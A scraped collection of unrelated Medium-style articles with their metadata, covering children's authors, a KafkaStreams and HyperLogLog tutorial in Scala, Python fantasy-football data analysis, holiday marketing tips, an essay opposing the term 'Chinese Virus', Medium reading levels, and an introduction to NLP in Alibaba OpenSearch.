a little more, and the adult has gained greater appreciation for the creativity and innocence of the immature mind. 
Although Clements himself is no longer with us, his work will continue to be relatable to elementary and middle school students for decades to come. Themes like imagination, friendship, leadership, and teamwork never go out of style. Lemony Snicket/Daniel Handler Handler published under the pen name Lemony Snicket when releasing his iconic set of novels, A Series of Unfortunate Events during the early 2000’s. The saga of the three orphaned Baudelaire siblings who are constantly on the run from the evil Count Olaf has sold millions of copies throughout its lifetime and been adapted into a film in 2004 and a Netflix series between 2017–2019. What makes this work such a must-read for any late-elementary school to middle-school aged kid is the amount of exposure they will receive to real-life problems, but doing so with a whimsy and sense of humor which is unmatched. The protagonists of the series use their inventiveness, book-smarts, and love of one another to overcome any problem they are faced with, which includes arson, underage marriage, and murder. These are all mature themes that have gotten the books banned from the libraries of certain schools around the United States, but rest assured that all of the topics are covered by Handler in a way that is not disturbing to a child. Tone and wording make the macabre elements more cartoony or comical than would be indicated in an adult novel. It introduces young readers to key literature analysis practices that they will certainly be doing much more often as they age into new curriculums. The books force the reader to debate the motivations and intentions behind every protagonist and antagonist, advancing past the surface level plot trope discussions that normally happen in early novel discussions. They’re a must for children and adults alike. And when you can get both age groups in the same room to talk about a book, that’s when you know it’s special.
https://medium.com/age-of-awareness/the-3-childrens-authors-you-must-read-ff3c7e9b8998
['Shawn Laib']
2020-12-08 05:16:01.012000+00:00
['Education', 'Books', 'Children', 'Creativity', 'Teaching']
Streaming With Probabilistic Data Structures: Why & How
In recent years, streaming libraries seem to have evolved significantly. To name a few, we’ve seen Akka Streams, KafkaStreams, Flink, Spark Streaming and others, becoming increasingly popular. There might be numerous reasons for that. A common motivation for using stream processing in your systems is to avoid heavy computations upon raw data in read-time. Instead, we can move those computations to an earlier stage — around the time when the raw data is produced. This architectural pattern allows us to obtain better response times in time-critical transactions, and have surged in popularity in correlation to the general growth of the data organizations handle. In this story, I will examine a rather complicated scenario that can not be easily solved by the intuitive capabilities that streamlining libraries usually offer. I will demonstrate how probabilistic data structures can help us mitigate a common anti-pattern often encountered in stream processing applications: carrying non-aggregative raw data deep down into a streaming topology for calculations, such as distinct count of elements. Before that, I will briefly review how streaming, in general, helps in maintaining aggregations of data, and why it might be a good idea to adopt it in some use-cases. I will use KafkaStreams for demonstrations along the way, but the concepts explored here can be applied in virtually any streaming library. Examples are written in Scala. Aggregating Upon A Stream Oftentimes, we want to aggregate raw data into some meaningful representation that will serve a business need later on. The simplest example for this, perhaps, is the WordCount program, which is kind of the HelloWorld of many streaming libraries. Here is an implementation of it using KafkaStreams. Basically, what it does is: consume some source Kafka topic as a stream some source Kafka topic as a stream split each value into single words each value into single words group that stream by each word that stream by each word count the occurrences per word the occurrences per word produce the results to another Kafka topic The basic idea behind using aggregations in your systems is planning ahead. If you figure out what you want to know about the raw data at a later stage, you can aggregate it and shape it into a form that represents the answers to those questions — right when you first know about the raw data. That means, it happens before those questions are being asked. In fact, some might never be asked, because practically, we are preparing answers for all possible questions we might need answers for! Stream processing aggregation in a nutshell This approach stands in complete opposition to the more conventional one — querying a database upon request and then crunching the results in order to achieve some desired result. This might work well in small apps maintained by small or medium sized teams, but becomes less practical with big data and boundaries between domains and teams naturally emerge. In that scenario, maintaining aggregations often are the adequate solution to various business requirements. Without stream processing, applications need to query and compute upon state in real time The Problem At Hand: Distinct Hashtag Count Alas, not all aggregations are achieved with the same degree of ease. It is no wonder that WordCount is so common as a beginner’s example — it is very easy to implement and understand. But let’s explore a different scenario. 
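As an aside, the WordCount gist referenced a few paragraphs above is not embedded in this copy of the post. A minimal sketch of what such a topology might look like with the kafka-streams-scala API (topic names and config values are placeholders, and this is not the author's exact code):

import java.util.Properties
import org.apache.kafka.streams.{KafkaStreams, StreamsConfig}
import org.apache.kafka.streams.scala.StreamsBuilder
import org.apache.kafka.streams.scala.ImplicitConversions._
import org.apache.kafka.streams.scala.Serdes._

object WordCount extends App {
  val builder = new StreamsBuilder

  builder
    .stream[String, String]("lines-topic")       // consume a source Kafka topic as a stream
    .flatMapValues(_.toLowerCase.split("\\W+"))  // split each value into single words
    .groupBy((_, word) => word)                  // group the stream by each word
    .count()                                     // count the occurrences per word
    .toStream
    .to("word-counts-topic")                     // produce the results to another Kafka topic

  val props = new Properties()
  props.put(StreamsConfig.APPLICATION_ID_CONFIG, "wordcount-sketch")
  props.put(StreamsConfig.BOOTSTRAP_SERVERS_CONFIG, "localhost:9092")

  new KafkaStreams(builder.build(), props).start()
}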
Take a social media ecosystem where we need to keep track of how many unique hashtags each user has mentioned in their posts. At a first glance, the streaming solution for this request seems like a direct continuation of what we’ve seen in WordCount. We could consume posts data, group it by user, and then extract & aggregate the hashtags used, perhaps in some Set , which would allow us to easily obtain our desired metric — distinct count. A pseudo-topology that seemingly answers the requests in an adequate way This is how our KafkaStreams topology might look like: A few things happen here. First, I’ve used type aliases in order to avoid the semantically-meaningless String flooding the code. Furthermore, I’ve extracted the logic of obtaining a Set[Hashtag] from a Post to a private function. Other than that, this is exactly what was just described. One of the things I like about KafkaStreams is how intuitive the API is — I think it is pretty easy to grasp and understand this piece of code, even if you haven’t worked with KafkaStreams before. One thing to remember is that this topology will continuously produce massages upon each change to the aggregation, and might be seen as a stream of updates. If you only need the latest state, you can define the output topic as log-compacted. There’s just one problem with this implementation: we have an unbounded data-structure in our topology, which means our streaming application can become more memory heavy than we might have predicted. Remember we said that aggregations are about transforming raw data in a way that fits our read-time needs? Well, our current implementation seems to have violated that concept. We don’t need that Set[Hashtag] really, we just want to know its size. But how can we maintain that number in a streaming application without keeping the underlying Set available? Can we do better? Probabilistic Data Structures To The Rescue Well, of course we can! This is where probabilistic data structures come in. If you haven’t heard of them, don’t worry, we’re going to explore an example together. We will focus on HyperLogLog (aka HLL), a probabilistic data structure that is aimed at solving the very problem we’re facing: … the count-distinct problem… [which] is the problem of finding the number of distinct elements in a data stream with repeated elements (Wikipedia) While the initial, Set -based solution will always be 100% accurate, HyperLogLog suggests a tradeoff: the allocated memory will be of a fixed size, but it might not be absolutely accurate at all times. By and large, the error rate is correlative to the allocated memory. Moreover, in most cases, the error will be of relatively small severity — that is, the estimated count might be off by just a bit. This is why HyperLogLog is considered a probabilistic data structure. In many use cases, this is a reasonable deal. If you’re working on a scenario in which you cannot have any error at all, then this kind of data structures are probably not suitable for your needs. A Scala Implementation Algebird is a neat Scala library created by the folks at Twitter, which is aimed at providing “abstractions for abstract algebra”. A significant part of that library revolves around approximate data types, and includes a HyperLogLog implementation. We’ll try to adapt our KafkaStreams app to use it, but first, let’s examine how to work with Algebird’s HyperLogLog implementation. The HLL type is the data structure itself. 
It responds to the #approximateSize method, allowing us to obtain the desired number — set-size, which is also known as cardinality. Similarly to working with the naïve Set , here we will also need to add elements to our data structure. Unlike Set , though, adding elements to an HLL is slightly more complex. The thing is, elements added aren’t kept within the HLL , as they are in a conventional Set . That’s the magic of HyperLogLog! If you’re curious about how it actually works, there are tons of videos or articles about it online. Previously, we relied on Set ‘s direct API for adding entries to the set. Algebird’s support for HyperLogLog relies on a common abstraction to achieve the same goal — combining things. That abstraction is called Monoid . Generally speaking, a Monoid for some type A lets us get an empty A and combine any two A ’s. And so, in order to add an element to an HLL , we need to obtain a HyperLogLogMonoid . This is achieved easily: val hllMonoid: HyperLogLogMonoid = new HyperLogLogMonoid(bits = 8) Note that you decide how many bits to allocate — this allows us to control the error rate. We can then get our empty, zero-state HLL : val init: HLL = hllMonoid.zero And simply add elements to it: val newElementData: Array[Byte] = "foobar".toCharArray.map(_.toByte) val newElement: HLL = hllMonoid.create(newElementData) val updatedHLL: HLL = init + newElement As you can see, we can use the HyperLogLogMonoid#create method in order to create a new HLL by passing an Array[Byte] to it. After that, we can add our new HLL to the existing one and get a new one with an updated state. With this knowledge, we can prepare an aggregation function that will replace the previous one we’ve had. We will group all this goodness together under a helper object, Aggregation : As you can see, we are using HyperLogLogMonoid#sum here, in addition to #create . It allows us to combine several HLL s into one, which suits our needs perfectly: we’ll extract the Hashtag s from each Post , then sum them into a HLL , which we will add to the existing, aggregative HLL . Exactly what we wanted to achieve! Putting It All Together With our aggregation function and initialization value ready, we can now go back to our KafkaStreams topology and use them there: I needed to adapt just two lines from the former implementation — the parameters passed to aggregate (line 22) and the way to obtain the (estimated) cardinality, in the map function (line 24). There’s just one thing left — we need to find a way to obtain a Serde[HLL] . If you are unfamiliar with KafkaStreams, this is Serde ‘s definition according to the official documentation: Every Kafka Streams application must provide SerDes (Serializer/Deserializer) for the data types of record keys and record values (e.g. java.lang.String ) to materialize the data when necessary. Essentially, KafkaStreams might need a certain Serde for various operations. Our code would not compile without it. Since aggregation by nature is a stateful operation (simply because we operate on information which is not bounded at the current message being processed), KafkaStreams needs to know how the information can be serialized and deserialized. Luckily, it is pretty easy to get a Serde[HLL] , like this: And with that we’re pretty much done! We’ve managed to incorporate HyperLogLog into our KafkaStreams topology, and honestly, we could have done that in any other Scala streaming library with the same effort, roughly. 
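The gist showing that Serde is not embedded in this copy of the post. A minimal sketch of one way to build it, assuming Algebird's HyperLogLog.toBytes/fromBytes helpers and the Serdes.fromFn factory from kafka-streams-scala (not necessarily the author's exact code):

import com.twitter.algebird.{HLL, HyperLogLog}
import org.apache.kafka.common.serialization.Serde
import org.apache.kafka.streams.scala.Serdes

// Serialize the HLL state with Algebird's byte codec so KafkaStreams
// can persist the aggregation's state store
implicit val hllSerde: Serde[HLL] = Serdes.fromFn[HLL](
  (hll: HLL) => HyperLogLog.toBytes(hll),
  (bytes: Array[Byte]) => Option(HyperLogLog.fromBytes(bytes))
)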
The main takeaway is how easy this change was and how elegant and concise the end result is. The full code, which includes tests and a runnable apps, is available here. Beyond HyperLogLog Perhaps by now you’re convinced that probabilistic data structures are really fascinating — and there is more than HyperLogLog! If you’re interested, don’t hesitate checking out other data structures implemented in Algebird:
https://medium.com/riskified-technology/streaming-with-probabilistic-data-structures-why-how-b83b2adcd5d4
['Eliav Lavi']
2020-10-27 10:11:11.572000+00:00
['Streaming', 'Engineering', 'Data Structures', 'Big Data', 'Scala']
Top Five Reasons to Learn Version Control Systems
Have you ever been in a situation where you were continually saving multiple documents with random names and got confused when you looked at them after a month or so? Well, many of us have been there, including me, and we know how tough that is each time! With the amount of information we’re exposed to increasing each day, it’s important — not just for Software Engineers, but for everyone — to be able to retrieve any piece of information from anywhere without arduous effort. For Software Engineers, it’s all the more crucial to get hands-on experience with Version Control tools, as they’ll be using them in their daily work. So, without any further ado, let’s look at the top five reasons why Software Engineers (and, obviously, others) should learn Version Control.
https://medium.com/datadriveninvestor/top-five-reasons-to-learn-version-control-89c33e04e9c2
['Abishaik Mohan']
2020-12-27 15:25:45.931000+00:00
['Technology', 'Software Development', 'Innovation', 'Productivity', 'Creativity']
Python for FPL(!) Data Analytics
Python for FPL(!) Data Analytics Using Python and Matplotlib to perform Fantasy Football Data Analysis and Visualisation

author’s graph

Introduction

There are two reasons for this piece: (1) I wanted to teach myself some Data Analysis and Visualisation techniques using Python; and (2) I need to arrest my Fantasy Football team’s slide down several leaderboards. But first, credit to David Allen for the helpful guide on accessing the Fantasy Premier League API, which can be found here.

To begin, we need to set up our notebook to use Pandas and Matplotlib (I’m using Jupyter for this), and connect to the Fantasy Premier League API to access the data needed for the analysis.

#Notebook Config
import requests
import pandas as pd
import numpy as np
%matplotlib inline
import matplotlib.pyplot as plt
plt.style.use('ggplot')

#API Set-Up
url = 'https://fantasy.premierleague.com/api/bootstrap-static/'
r = requests.get(url)
json = r.json()

Then, we can set up our Pandas DataFrames (think data tables), which will be queried for valuable insights — hopefully. Each DataFrame (_df) we create relates to a JSON data structure accessible via the FPL API. For a full list of these, run json.keys(). We’re interested in ‘elements’ (player data), ‘element_types’ (positional references), and ‘teams’.

elements_df = pd.DataFrame(json['elements'])
element_types_df = pd.DataFrame(json['element_types'])
teams_df = pd.DataFrame(json['teams'])

By default, elements_df contains a number of columns we aren’t interested in right now (for an overview of each DataFrame, see David’s article). I’ve created a new DataFrame — main_df — with the columns I might want to use.

main_df = elements_df[['web_name','first_name','team','element_type','now_cost','selected_by_percent','transfers_in','transfers_out','form','event_points','total_points','bonus','points_per_game','value_season','minutes','goals_scored','assists','ict_index','clean_sheets','saves']]

It’s important to note that elements_df uses keys to reference things such as a player’s position and team. For example, in column ‘element_type’, a value of “1” = goalkeeper, and in column ‘team’ a value of “1” = Arsenal. These are references to the two other DataFrames we created (element_types_df and teams_df). If we preview element_types_df, we’ll see that each ‘id’ number here corresponds to a position:
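The preview table itself isn’t reproduced here, but to make those id references concrete, here is a hedged follow-up sketch — the column names singular_name and name are assumptions based on the public FPL API rather than something shown in the article:

# Map the numeric ids in main_df onto readable labels (column names assumed).
position_map = element_types_df.set_index('id')['singular_name']
team_map = teams_df.set_index('id')['name']

main_df = main_df.copy()
main_df['position'] = main_df['element_type'].map(position_map)
main_df['team_name'] = main_df['team'].map(team_map)

# Quick sanity check that the mappings line up.
print(main_df[['web_name', 'team_name', 'position', 'now_cost', 'total_points']].head())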
https://towardsdatascience.com/python-for-fpl-data-analytics-dadb414ccefd
['Charlie Byatt']
2020-10-16 18:20:34.390000+00:00
['Python', 'Data Analysis', 'Matplotlib', 'Data Visualization', 'Football']
The “business book” version of Harry Potter
What we can learn from Harry Potter Think of how much we learn about love and friendship and perseverance through reading a book like Harry Potter. Let’s use a super relatable example of a narrative structure used well in this book and how it taught us about character motivations and reliability. (And okay, I’m going to say something here that may shock you if for some reason you’re one of the three remaining people on Earth who hasn’t read Harry Potter yet. If that’s you, then stop reading now.) Spoiler alert: Dumbledore dies. Not just dies, but Snape kills him. In cold blood. Right there, on the balcony with his wand. While Harry is watching. Damn. For me, this was one of those moments in literature that really came to define how I looked at life, death, love, and friendship. I read this book super early on in my life, while I was still a sponge for information, and it may have been one of the first characters outside of a Disney movie that I came to love who was then taken away from me. Of course, we get over this, yes. But then we also learn from it. And we learn how much of a badass Harry Potter becomes afterward — we know exactly why Harry needs to avenge his death. We know about his parents and their deaths, and we understand, even if we will never truly relate, to the reasons why he has to ultimately take on all of the horcruxes, destroy them, and eventually go toe-to-to with the evil Voldemort. Part of the beauty of this sequence is that it takes a lifetime to get there. Seven books and over 1 million words in all. Was the payoff worth it? Just look to how much the Harry Potter franchise is worth, and you tell me. Now, let’s try one more thing. I’m going to tell the Harry Potter story in a business book inspired anecdote. Ready? Here we go: Harry Potter as a business book case study: In this local school district, the unthinkable happened: The headmaster was murdered. Not only that, but the murderer remained at large. The remaining faculty and students had all the signs of early onset panic, not to mention questions from parents at home and the unrelenting press inquiries. In the 1,000 years since Hogwarts has been the pre-eminent wizarding institution, it was this murder that might put it all at risk. What could they do? But, as we’ve discussed earlier in this book, sometimes the greatest leaders emerge from the least likely of places. In the end, it wouldn’t be the headmaster-in-training or any other senior faculty who would reclaim the honor and dignity of this venerable institution, but a boy. You see, this boy had a decade’s worth of anger and revenge building up in him about murders like this. His parents had also been murdered, and, particularly early on in his school years, he was called out regularly for “being different.” (He had a peculiar scar above his forehead and a strange connection to snakes.) It turned out that, over the years, this boy, Harry, had established something similar to a paternal relationship with Albus Dumbledore. And Albus had, in turn, been teaching Harry, too. When Dumbledore was murdered, Harry rallied his friends together and committed them to a pact. They met in secret, practicing illegal spells on school property and training for a potential future battle. Eventually, these friendships, and the skills they acquired together, saved the school from the battle of the millennium, thereby saving the school, and most of those inside. 
This is why it’s important to always encourage the “kids who are just a little bit different.” You never know who will have a chip on their shoulder big enough to save your entire world one day. Something tells me this wouldn’t quite rally the same kind of emotional turbulence inside that would get people dressing up like wizards and taking quizzes about which sorting house they belong inside for decades to come. Maybe the trouble with business books isn’t that they aren’t telling stories. Maybe it’s just that we aren’t telling them the right way.
https://bethanymarz.medium.com/the-business-book-version-of-harry-potter-b36af7d6c29f
['Bethany Crystal']
2019-02-11 13:06:06.376000+00:00
['Business', 'People', 'Stories', 'Books', 'Harry Potter']
10 Holiday Marketing Tips from Larry Kim, Neil Patel and More
It’s time to amp up and adjust our marketing strategies for the holidays! If you want to get ahead of the marketing game and stand out from the crowd, check out these incredible unicorn tips from the top social media marketing experts. We’ve got insights from Mari Smith, Neil Patel, Virginia Nussey, Dennis Yu, Lilach Bullock, Lisa Dougherty, Marsha Collier, Sujan Patel and Kristel Cuenta-Cortez. Among the tips? Leveraging live videos, launching Facebook Messenger chatbots, running social media ads and more — all with the aim of increasing brand visibility, ramping up your holiday sales and boosting ROI. So let’s jump right in — and I’ll start with my own №1 holiday marketing tip! 1. Run Facebook Messenger Ads | Larry Kim, CEO of MobileMonkey Ad prices get crazy competitive around the holidays! Since most of your sales are going to come from customers with pre-existing brand affinity, focus the majority of your social ads budget using remarketing as the targeting option rather than trying out new, unproven audiences at this critical time. People’s inboxes will be full of offers, so try reaching your audience using new higher-engagement marketing channels like Facebook Messenger ads in Facebook and Instagram to ensure your targeted audience actually sees your important marketing messages 2. Go Live on Facebook | Mari Smith, Facebook Marketing Expert Use holiday-themed Facebook Live videos to really engage with your audience this holiday season. Facebook continues to favor content that generates meaningful social interaction, specifically conversations between people within the comments on Page posts. Live video typically leads to discussion among viewers on Facebook, which helps bump up the algorithms and you should see even more reach on your posts. In fact, Facebook states that live videos on average get six times as many interactions as regular videos. Strive to stand out in the news feed and create “thumb-stopping” live video content that draws your audience in. What if you did a whole “bah humbug” Facebook Live centered around how crazy it is that stores seem to start pushing the Holidays earlier and earlier every year? Use the broadcast as a fun way to get your audience talking to you — and with one another — about their preferences around the Holidays. You can then retarget your video viewers with different content driving to your website, offers, etc. Or, perhaps someone in your office would be willing to dress up as Santa Claus and do a whole series of Facebook Live videos where you do prize drawings and giveaways! Or, mobilize some team members to come on live video as “Santa’s elves” and show behind-the-scenes of how your products are created, or your service is developed. Think outside the box and get creative to put a smile on the faces of your prospects and customers and have your business/brand be top of feed and top of mind! 3. Collaborate with Influencers and Create Gift Suggestions | Lilach Bullock, Content Marketing and Social Media Specialist It’s difficult to stand out during the holiday season when everybody is sharing special offers and discounts. But one way to stand out and generate better results during this period, is to collaborate with a relevant social influencer as they can help you reach a wider audience. However, you need to start working on this campaign way ahead of time: from finding the ideal influencers to work with to planning the actual content, it’s a big project but one that can yield amazing results. 
Another tip I have to mention is to create remarketing campaigns on social media and target all of those people who viewed your products but didn’t buy. Everyone is looking for gifts during this time period so chances are, they’re checking out a lot of ideas and products — remind them of your products at the right time and it can have an amazing effect on your sales. 4. Give Your Social Media Channels a Holiday Makeover | Virginia Nussey, Marketing Director at MobileMonkey Holiday fever is not just for ecommerce. B2B should get hyped for the holidays, too. Holidays are an occasion for a company to reveal its customer appreciation along with its culture, brand and staff appreciation. And doing so can have a positive marketing impact through visibility and brand affinity during the cheery time of year. Give your Facebook chatbot and social media avatars a holiday makeover — and that will mean something different for every brand. Just because B2B marketers don’t have a Black Holiday sale to promote for the holidays (although, you certainly could!), doesn’t mean you shouldn’t have some holiday fun. Your customers (and future customers) may fall a little more in love with you when you take the opportunity to get in the spirit! 5. Curate Sentimental User-Generated Content | Dennis Yu, CEO of BlitzMetrics My №1 tip for the holidays … ask customers and employees what they’re grateful for, collecting the pictures and videos. Then after getting their permission, you now have a massive library of UGC (user-generated content) that you can mix and match to drive sales without having to rely as much on sales and discounts. And now you’ve solved your content issue, too. 6. Run Remarketing Ads | Neil Patel, Founder of Neil Patel Digital During the holiday season, expect your ad costs to increase. Consider pushing out more educational content and sharing them on your social profiles. You can even spend a bit of ad money to promote these educational pieces. From there remarket all of those users and pitch them your product/service through remarketing ads. It’s one of the cheapest ways to acquire customers from the social web at an affordable rate. 7. Show the Human Side of Your Business | Sujan Patel, Co-founder of Mailshake Something I’ve seen that customers and followers of our brand engage with around the holidays is learning more about the team behind the scenes. We are fully remote, and have employees working literally around the world. We’ll work with our employees to share interesting stories about them with our audience to give people the human side of our business. People are in “family” mode, not “business” mode around the holidays. Sharing our company family with them pulls on that thread a bit. 8. Start Early | Marsha Collier, Social Media Author It’s a two-pronged approach. Start by reconnecting with your existing customers very early on without a hard sell. Let them know you’re there to help make their holidays easier. Then during the season, your ads should always go for the hard close — make your offer ads irresistible. 9. Create Holiday-Themed Content | Kristel Cuenta-Cortez, Social Media Strategist There’s so much truth in the statement “If you fail to plan, you plan to fail,” especially when crafting a social media campaign for your brand. One best practice successful brands do to ramp up their campaigns is to put together a holiday-themed content schedule based on their goals. 
For example, if your goal is to solicit customer reviews and collect user-generated content that you can utilize in the future, you can run a simple photo contest where you ask your customers to submit their entries with a branded hashtag. Pick a relevant prize and decide on the theme, and find the best time to launch it! Monitor your results and adjust your strategy as you go along! This doesn’t only provide social proof, but it also saves valuable time and effort since user-generated content is generally free. 10. Leverage Influencers | Lisa Dougherty, Community Manager at Content Marketing Institute My number one social media marketing tip for B2C marketers is to work with top influencers in your niche. People like to scroll through their newsfeeds looking for gift-giving ideas. I know I do. And, they tend to trust brand recommendations from individuals (even if they don’t know them). But, before you get started, make sure you’ve set a clear goal that aligns with your business objectives. Once you’ve determined your goals, you’ll need to find the right influencers in your industry to work with. Once you do, put those influencers to work as your brand’s little elves creating customized content for your social media channels to help increase visibility, trustworthiness, and generate ROI for your brand. Be a Unicorn in a Sea of Donkeys Get my very best Unicorn marketing & entrepreneurship growth hacks: 2. Sign up for occasional Facebook Messenger Marketing news & tips via Facebook Messenger. About the Author Larry Kim is the CEO of MobileMonkey — provider of the World’s Best Facebook Messenger Marketing Platform. He’s also the founder of WordStream. You can connect with him on Facebook Messenger, Twitter, LinkedIn, Instagram. Do you want a Free Facebook Chatbot builder for your Facebook page? Check out MobileMonkey! Originally posted on Inc.com
https://medium.com/marketing-and-entrepreneurship/10-holiday-marketing-tips-from-larry-kim-neil-patel-and-more-ac0731e1e7a7
['Larry Kim']
2020-10-20 08:08:14.523000+00:00
['Marketing', 'Entrepreneurship', 'Business', 'Social Media', 'Marketing Tips']
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus”
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus” Chinese people have enough to deal with right now. Let’s not add our bigotry to their misery. There’s a pretty big debate raging right now in the United States— and pretty much only in the United States— over whether or not COVID-19 should be dubbed the “Chinese Virus.” To me this seemed so obviously xenophobic that I didn’t feel much need to write a rebuttal. The nomenclature was being pushed almost exclusively by conservatives with a history of bigotry, including President Trump himself. But then somehow, the nonsense started to spread. While most of the mainstream media is heeding the advice of the World Health Organization to not use the term “Chinese Virus,” liberal comedian and talk show host Bill Maher disagrees. On the April 10 episode of his TV show Real Time, Bill Maher thought it wise to film a five-minute rant about how this whole thing is China’s fault, and we should all be blaming them. Before Bill acts as a carrier to spread this xenophobic stance beyond the toxic bubble of conservative news and radio, I would like to offer my counterargument. I can’t believe this needs to be said, but here’s why we shouldn’t be calling COVID-19 the “Chinese Virus.” Real Time with Bill Maher, 10 April 2020 1. The “we always do” argument is counterfactual Bill starts his segment by giving a bunch of examples of viruses that were named after where they originated. This is an argument I’ve also seen from prominent figures on Twitter — that because Lyme disease was named after a town of 7,000 people in Connecticut, coronavirus should be tied to the 1.38 billion people of China. This argument doesn’t hold for several reasons. First of all, why all of China? The disease originated very specifically from a single wet market in Wuhan province; why not name it after that one market? The reason is simple: accuracy was never the true concern. Ebola was named after a river, not a country or an ethnicity. Zika virus was named after a forest. Nobody is blaming the river or the forest for the spread of the virus, but Bill explicitly wants to blame China, so he expands his naming convention to fit his political argument. The one case that Bill clings to where a virus was actually named after a fairly large part of the world is MERS, or Middle Eastern Respiratory Syndrome. But even here, nobody uses the full name, nobody blamed the entire Middle East for having areas where camels live in close proximity to humans (MERS is said to have originated from a camel), and the region is home to a wide variety of countries and ethnicities, making the name arguably less xenophobic. The other important counter argument to this whole “this is how we’ve always named viruses” nonsense is that, well, it’s not. SARS stands for Severe Acute Respiratory Syndrome, not South-Asian Respiratory Syndrome. Think of all the pandemics we’ve suffered in recent memory, whether mad cow disease, swine flu, bird flu, HIV, HPV, even going back to the black plague — none of these were named after where the disease originated. Naming the virus after the region where it originated is the exception, not the rule. If anything, we should be questioning why we thought MERS was acceptable. 
The final argument on this point is that when the virus began, nobody was calling it the “Chinese Virus.” The virus first showed up in the media as simply “the coronavirus.” That name is still used in a lot of other countries — in France it’s “coronavirus,” in Japan it’s “new-form corona” (新型コロナ). Only in countries that, for some reason or another, want to blame China is the term “Chinese Virus” used, and it was adopted well after the virus started to spread. Well after other names were already attributed and widely accepted. 2. There are reasons to criticize China. The origin of the virus isn’t one of them. Now that we’ve established that there is no historical or logical reason to call COVID-19 the “Chinese Virus,” let’s look at the core of Bill’s rant: blaming China. The only clear reason he gives to is that some people in China eat bats. There is a sliver of truth to part of this argument. It’s true that wet markets are vectors for disease. It’s true the Chinese government knew about this, and poor policy decisions made this pandemic worse. But none of that has to do with eating bats. Bill is essentially saying, “Eating bats is wrong; the whole world should eat what I find palatable, like chickens, pigs and cows.” Plenty of people around the world eat plenty of food that, if mishandled, can lead to disease. This includes the United States, where you can buy a whole host of exotic meats if you know where to look. From an epidemiological perspective, the problem isn’t what Chinese people are eating, but how those animals are being handled. The close proximity and unsanitary conditions in wet markets make it more likely for certain virus strands to jump species and mutate in ways that can ultimately be dangerous to humans. Chinese authorities knew about these risks but authorized wet markets anyway, which is a reckless and shortsighted policy that deserves criticism. Blame the authorities, not the entire country and its population. Also, stop with the “Ewww gross, how could you eat that?” argument as a way to demonize other cultures. Bill’s tirade becomes particularly misleading when he implies that Chinese culture in general is causing a bunch of viruses to emerge. It’s true SARS also originated from the same region, although there is not enough evidence to suggest it came from a wet market. Bird flu likely comes from intensive bird farming — those chickens that almost everyone eats in tremendous quantities all over the world. The bird flu epidemic started in Hong Kong, which doesn’t have wet markets, and whose culture overall is significantly different from that of the people in Wuhan province. To sum up, the coronavirus is much more complex than “China does unhealthy stuff,” and using this pandemic to air out political grievances isn’t helping anyone. 3. We’re all in this together The world’s leading health and human rights experts are adamant: We’re all in this together, and we should be much more careful in assigning blame. Chinese authorities now have to respond to their negligence both domestically — as many of their people died and their economy is in shambles — and internationally. There should be pressure on the Chinese government to take aggressive measures to ensure a coronavirus outbreak doesn’t happen again. In practice, they should implement strict measures to close wet markets and more closely control the handling and sale of animals. 
That being said, for the vast majority of people in China who have never even been to a wet market, the virus itself is already a heavy and tragic burden. Those people deserve our solidarity; not misguided antipathy. Anger and fear are the most natural human reactions in times of crisis, but they only serve to make things worse. I don’t expect Bill to realize how mistaken his views are — controversy brings in ratings, which bring in money. I only hope his fans will think critically, recognize that he is wrong, and denounce him for using his platform to spread misinformation and stoke antagonism. The pandemic is causing more than enough human suffering as is. Let’s not add bigotry to misery.
https://medium.com/an-injustice/bill-maher-is-wrong-we-shouldnt-call-covid-19-the-chinese-virus-5d416100c2a2
['Alex Steullet']
2020-04-15 22:28:43.211000+00:00
['Culture', 'Society', 'Coronavirus', 'China', 'Politics']
Stop Thinking You Need to Dumb Down Your Articles for Medium
Stop Thinking You Need to Dumb Down Your Articles for Medium I analyzed the top 10 popular articles for the day, and this is what I discovered. Photo by Christian Perello on Unsplash If you read Medium articles on how to succeed at writing on Medium, you likely have seen the popular advice that you need to keep your writing level around a 6th-grade reading level. The argument here is that the average American has around a 7th or 8th-grade reading level. Also, online reading is quite different than printed pages. When people read articles online, they tend to scan rather than read every word. Now, writing at a 6th-grade reading level doesn't mean your writing is meant for 6th graders. Ernest Hemingway famously wrote at a 5th-grade reading level much of the time, and his works are not taught in grammar school. However, I question the need to write at a 6th grade level for the Medium audience. For one thing, many Medium readers are also writers. Writers tend to read a lot. People who read a lot naturally read at higher levels than those who do not. Further, not every popular article on the internet is at a low reading level. The New York Times articles, for example, average a 10th-grade reading level. But what about Medium? Do we really need to be shooting for 6th-grade reading levels to get more claps and reader engagement?
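The article doesn’t say which tool produced its grade-level numbers; as one hedged way to run the same kind of check on your own drafts, the Python textstat package (my choice, not necessarily the author’s) estimates standard readability scores:

import textstat

draft = (
    "If you read Medium articles on how to succeed at writing on Medium, "
    "you have likely seen the advice to keep your writing around a "
    "6th-grade reading level."
)

# Flesch-Kincaid converts sentence length and syllables per word into a U.S. grade level;
# Flesch Reading Ease gives a 0-100 score where higher means easier to read.
print(textstat.flesch_kincaid_grade(draft))
print(textstat.flesch_reading_ease(draft))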
https://medium.com/illumination/stop-thinking-you-need-to-dumb-down-your-articles-for-medium-dcee6eb75f10
['Jennifer Geer']
2020-10-24 18:04:01.690000+00:00
['Creativity', 'Writing Tips', 'Medium', 'Writing Advice', 'Writing']
The Application of Natural Language Processing in OpenSearch
Catch the replay of the Apsara Conference 2020 at this link!

By ELK Geek, with special guest, Xie Pengjun (Chengchen), Senior Algorithm Expert of Alibaba Cloud AI

Introduction: When building search engines, effect optimization issues will emerge, many of which are related to Natural Language Processing (NLP). This article interprets and analyzes these issues by working through the technical points of NLP in OpenSearch.

Natural Language Processing

Research on NLP aims to achieve effective communication between humans and computers through language. It is a science that integrates linguistics, psychology, computer science, mathematics, and statistics. It involves many topics, such as the analysis, extraction, understanding, conversion, and generation of natural and symbolic languages.

The Stages of AI

Computing Intelligence: It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is AlphaGo from Google. With the strong computing power of Google TPU and the combination of algorithms like Monte Carlo Tree Search (MCTS) and reinforcement learning, AlphaGo can make good decisions by processing massive amounts of information about the game of Go. Thus, it can outperform humans in terms of computational ability.

Intellisense: It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information such as people’s names, places, and institutions.

Cognitive Intelligence: Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, the sentences “谢霆锋是谁的儿子” (“Whose son is Xie Tingfeng?”) and “谁是谢霆锋的儿子” (“Who is Xie Tingfeng’s son?”) contain the same characters, but their semantics are different. This is what cognitive intelligence aims to solve.

